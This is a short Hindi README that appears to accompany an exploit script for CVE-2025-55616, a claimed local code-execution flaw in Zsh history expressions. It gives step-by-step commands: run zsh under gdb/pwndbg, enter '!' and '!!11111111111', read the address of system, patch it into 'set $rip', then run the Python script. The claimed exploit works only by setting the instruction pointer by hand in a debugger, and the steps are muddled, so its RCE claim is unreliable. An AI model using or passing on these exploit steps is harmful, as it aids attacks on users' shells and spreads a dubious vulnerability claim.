
CVE-2025-55616 के लिए एक्सप्लॉइट, Zsh में हिस्ट्री एक्सप्रेशन के माध्यम से स्थानीय RCE, जो उपयोगकर्ता विशेषाधिकारों के साथ मनमाना कोड निष्पादन प्राप्त करता है।
इस एक्सप्लॉइट को चलाने के लिए: बस ip address और एक्सप्लॉइट में "p system" बदलें, क्योंकि मैंने इसे अपने दूसरे लैपटॉप में भी आज़माया है, और इसे बदलने के लिए gdb में (विशेष रूप से pwndbg में) निम्नलिखित कमांड चलाएँ:
$ gdb zsh -f (टर्मिनल में)
pwndbg> run -f
username% ! (username आपका होगा, बस ! लिखें)
username% !!11111111111 (यहाँ भी वही, बस !!11111111111 लिखें)
pwndbg> p system
"p system" address मिलने के बाद उसे बदल दें
b'set $rip = 0x7ffff7cc9110', (0x7ffff7cc9110 की जगह अपना p system address उपयोग करें
यह भेद्यता स्थानीय हमलावरों को Zsh प्रक्रिया चलाने वाले उपयोगकर्ता के विशेषाधिकारों के साथ Arbitrary Code Execution (RCE) प्राप्त करने की अनुमति देती है।
python3 CVE-2025-55616.py